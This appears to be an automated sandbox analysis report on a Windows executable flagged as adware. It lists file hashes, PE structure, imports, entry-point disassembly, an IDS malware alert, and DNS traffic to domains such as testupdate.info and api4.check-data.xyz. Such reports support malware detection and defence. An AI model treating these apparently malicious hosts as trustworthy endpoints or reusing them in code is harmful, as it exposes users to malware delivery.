                        SHA-512:88731282343DF42EDE03BF0BA7CBD16AE113A4116C0A65A99B01D1A55B4A6F8498C1D9133BFF91A754F09395E49B0C64DBB855691E9F86B74ADAF2F79BD6BCA2
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 40%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%$..aE..aE..aE..l...JE..l.7.&E..l.6.E.....jE..aE..DD....3.dE..l...`E......`E..RichaE..........................PE..L...qVC^.....................Z.......:............@..........................P........l...@..................................d..x.......:u.......................M..................................@nk.@............`...............................text............................... ..`.data....v........[.................@....idata.......`........k.............@..@.rsrc...:u.......v....k.............@..@.reloc...M.......N..."l.............@..B........................................................................................................................................................................................................................................................................................................................

                        C:\Windows\Temp\__PSScriptPolicyTest_m40klbcy.5ve.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Windows\Temp\__PSScriptPolicyTest_t5ujbnql.ve0.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        \Device\ConDrv

                        Download File
                        Process:C:\Windows\System32\gpupdate.exe
                        File Type:ASCII text, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):129
                        Entropy (8bit):4.366220328806915
                        Encrypted:false
                        SSDEEP:3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
                        MD5:EF6D648C3DA0518B784D661B0C0B1D3D
                        SHA1:C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
                        SHA-256:18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
                        SHA-512:E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
                        Malicious:false
                        Preview:Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.99698170606889
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:7648603
                        MD5:f85e68ee713c8396beb1a86d8e2500f4
                        SHA1:b321bd443f2fc670acbcd8f629e7f0134235bd16
                        SHA256:26583795c29a238e069f2ecaf6960bcace1d82a2feaeef4194fafc52e5bd9457
                        SHA512:d6523d1992af0b3997f1af1f2ac7981f24d4ac9b52ee3a389cc56a4551ce8af5aac373a53012862f45264c478ea5e5b64360c563ad95240f946117db659ec886
                        SSDEEP:196608:91O2a02BqgCa1jFZWCRWbb24sPV7zaUUQ+AN9bqJSkWZmY5h/y65TKS+:3OytgnjfRkb2Z3X+02iZ9hBTKS+
                        TLSH:D8763332FCD98AB8EB594471C7822FC9F966C52A0E22962FF3C5451CE6380E8F571257
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........

                        File Icon

                        Icon Hash:8484d4f2b8f47434

                        Static PE Info

                        General

                        Entrypoint:0x414b04
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:
                        Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:3786a4cf8bfee8b4821db03449141df4

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        push FFFFFFFFh
                        push 0041B9E0h
                        push 00414A2Ch
                        mov eax, dword ptr fs:[00000000h]
                        push eax
                        mov dword ptr fs:[00000000h], esp
                        sub esp, 58h
                        push ebx
                        push esi
                        push edi
                        mov dword ptr [ebp-18h], esp
                        call dword ptr [0041B074h]
                        xor edx, edx
                        mov dl, ah
                        mov dword ptr [004233D0h], edx
                        mov ecx, eax
                        and ecx, 000000FFh
                        mov dword ptr [004233CCh], ecx
                        shl ecx, 08h
                        add ecx, edx
                        mov dword ptr [004233C8h], ecx
                        shr eax, 10h
                        mov dword ptr [004233C4h], eax
                        push 00000001h
                        call 00007F9B70C88CDBh
                        pop ecx
                        test eax, eax
                        jne 00007F9B70C87E4Ah
                        push 0000001Ch
                        call 00007F9B70C87F08h
                        pop ecx
                        call 00007F9B70C8878Dh
                        test eax, eax
                        jne 00007F9B70C87E4Ah
                        push 00000010h
                        call 00007F9B70C87EF7h
                        pop ecx
                        xor esi, esi
                        mov dword ptr [ebp-04h], esi
                        call 00007F9B70C8A8FCh
                        call dword ptr [0041B078h]
                        mov dword ptr [00425A3Ch], eax
                        call 00007F9B70C8A7BAh
                        mov dword ptr [00423340h], eax
                        call 00007F9B70C8A563h
                        call 00007F9B70C8A4A5h
                        call 00007F9B70C89F00h
                        mov dword ptr [ebp-30h], esi
                        lea eax, dword ptr [ebp-5Ch]
                        push eax
                        call dword ptr [0041B07Ch]
                        call 00007F9B70C8A436h
                        mov dword ptr [ebp-64h], eax
                        test byte ptr [ebp-30h], 00000001h
                        je 00007F9B70C87E48h
                        movzx eax, word ptr [ebp+00h]

                        Rich Headers

                        Programming Language:
                        • [ C ] VS98 (6.0) SP6 build 8804
                        • [C++] VS98 (6.0) SP6 build 8804
                        • [ C ] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [EXP] VC++ 6.0 SP5 build 8804

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9e40x64.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000xa60.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1f8.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x199ea0x19a00False0.5822884908536585DOS executable (COM)6.608494417524647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x1b0000x44940x4600False0.31166294642857145data4.368016436198423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x200000x5a480x3200False0.122890625data1.370539432871311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .sxdata0x260000x40x200False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x270000xa600xc00False0.3388671875data3.3019646948427273IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x274a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                        RT_ICON0x277880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States
                        RT_DIALOG0x278d80xb8dataEnglishUnited States
                        RT_STRING0x279900x94dataEnglishUnited States
                        RT_STRING0x27a280x34dataEnglishUnited States
                        RT_GROUP_ICON0x278b00x22dataEnglishUnited States
                        RT_VERSION0x271e00x2bcdataEnglishUnited States

                        Imports

                        DLLImport
                        OLEAUT32.dllVariantClear, SysAllocString
                        USER32.dllSendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
                        SHELL32.dllShellExecuteExA
                        KERNEL32.dllGetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.2.754.191.228.3749726802041922 01/08/23-16:17:27.579970TCP2041922ET MALWARE Win32/Adware.Neoreklami.MI Activity M24972680192.168.2.754.191.228.37

                        Network Port Distribution

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 8, 2023 16:17:15.351670027 CET5100753192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:15.369489908 CET53510078.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:15.636260033 CET6076553192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:15.660317898 CET53607658.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:18.324352980 CET4951653192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:18.448676109 CET53495168.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:18.747256994 CET6267953192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:18.771744967 CET53626798.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:21.742784023 CET6139253192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:21.762454033 CET53613928.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:22.048397064 CET5210453192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:22.066093922 CET53521048.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:27.322318077 CET6535653192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:27.341753006 CET5900653192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:27.363290071 CET53653568.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:27.394197941 CET5152653192.168.2.78.8.8.8
                        Jan 8, 2023 16:17:27.414591074 CET53515268.8.8.8192.168.2.7
                        Jan 8, 2023 16:17:27.457952023 CET53590068.8.8.8192.168.2.7

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 8, 2023 16:17:15.351670027 CET192.168.2.78.8.8.80x5d7fStandard query (0)www.testupdate.infoA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.636260033 CET192.168.2.78.8.8.80xe83aStandard query (0)files.testupdate.infoA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.324352980 CET192.168.2.78.8.8.80x6522Standard query (0)www.testupdate.infoA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.747256994 CET192.168.2.78.8.8.80xf4eStandard query (0)files.testupdate.infoA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.742784023 CET192.168.2.78.8.8.80xc26dStandard query (0)www.testupdate.infoA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:22.048397064 CET192.168.2.78.8.8.80x5e00Standard query (0)files.testupdate.infoA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.322318077 CET192.168.2.78.8.8.80xf305Standard query (0)api4.check-data.xyzA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.341753006 CET192.168.2.78.8.8.80xb36aStandard query (0)www.testupdate.infoA (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.394197941 CET192.168.2.78.8.8.80xed57Standard query (0)api4.check-data.xyzA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)www.testupdate.infoenv-3936544.jcloud.kzCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.105A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz195.49.211.250A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.56A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.161A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.98A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz195.49.211.239A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.224A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.157A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz195.49.211.196A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.149A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.117A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.123A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz185.22.66.219A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.369489908 CET8.8.8.8192.168.2.70x5d7fNo error (0)env-3936544.jcloud.kz195.49.211.229A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.660317898 CET8.8.8.8192.168.2.70xe83aNo error (0)files.testupdate.infod1u0l9f6kr1di3.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:15.660317898 CET8.8.8.8192.168.2.70xe83aNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.167A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.660317898 CET8.8.8.8192.168.2.70xe83aNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.21A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.660317898 CET8.8.8.8192.168.2.70xe83aNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.116A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:15.660317898 CET8.8.8.8192.168.2.70xe83aNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.172A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)www.testupdate.infoenv-3936544.jcloud.kzCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.105A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz195.49.211.250A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.117A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz195.49.211.196A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz195.49.211.239A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.149A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.161A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.56A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.157A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.219A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.98A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz195.49.211.229A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.123A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.448676109 CET8.8.8.8192.168.2.70x6522No error (0)env-3936544.jcloud.kz185.22.66.224A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.771744967 CET8.8.8.8192.168.2.70xf4eNo error (0)files.testupdate.infod1u0l9f6kr1di3.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:18.771744967 CET8.8.8.8192.168.2.70xf4eNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.21A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.771744967 CET8.8.8.8192.168.2.70xf4eNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.172A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.771744967 CET8.8.8.8192.168.2.70xf4eNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.116A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:18.771744967 CET8.8.8.8192.168.2.70xf4eNo error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.167A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)www.testupdate.infoenv-3936544.jcloud.kzCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.105A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz195.49.211.250A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.56A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.161A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.98A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz195.49.211.239A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.224A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.157A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz195.49.211.196A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.149A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.117A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.123A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz185.22.66.219A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:21.762454033 CET8.8.8.8192.168.2.70xc26dNo error (0)env-3936544.jcloud.kz195.49.211.229A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:22.066093922 CET8.8.8.8192.168.2.70x5e00No error (0)files.testupdate.infod1u0l9f6kr1di3.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:22.066093922 CET8.8.8.8192.168.2.70x5e00No error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.167A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:22.066093922 CET8.8.8.8192.168.2.70x5e00No error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.21A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:22.066093922 CET8.8.8.8192.168.2.70x5e00No error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.116A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:22.066093922 CET8.8.8.8192.168.2.70x5e00No error (0)d1u0l9f6kr1di3.cloudfront.net108.139.241.172A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.363290071 CET8.8.8.8192.168.2.70xf305No error (0)api4.check-data.xyzcheckdata-1114476139.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:27.363290071 CET8.8.8.8192.168.2.70xf305No error (0)checkdata-1114476139.us-west-2.elb.amazonaws.com54.191.228.37A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.363290071 CET8.8.8.8192.168.2.70xf305No error (0)checkdata-1114476139.us-west-2.elb.amazonaws.com54.185.139.178A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.414591074 CET8.8.8.8192.168.2.70xed57No error (0)api4.check-data.xyzcheckdata-1114476139.us-west-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:27.414591074 CET8.8.8.8192.168.2.70xed57No error (0)checkdata-1114476139.us-west-2.elb.amazonaws.com54.191.228.37A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.414591074 CET8.8.8.8192.168.2.70xed57No error (0)checkdata-1114476139.us-west-2.elb.amazonaws.com54.185.139.178A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)www.testupdate.infoenv-3936544.jcloud.kzCNAME (Canonical name)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.56A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz195.49.211.250A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.157A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.161A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.123A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz195.49.211.229A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.149A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.117A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz195.49.211.239A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.224A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.98A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.105A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz185.22.66.219A (IP address)IN (0x0001)false
                        Jan 8, 2023 16:17:27.457952023 CET8.8.8.8192.168.2.70xb36aNo error (0)env-3936544.jcloud.kz195.49.211.196A (IP address)IN (0x0001)false

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

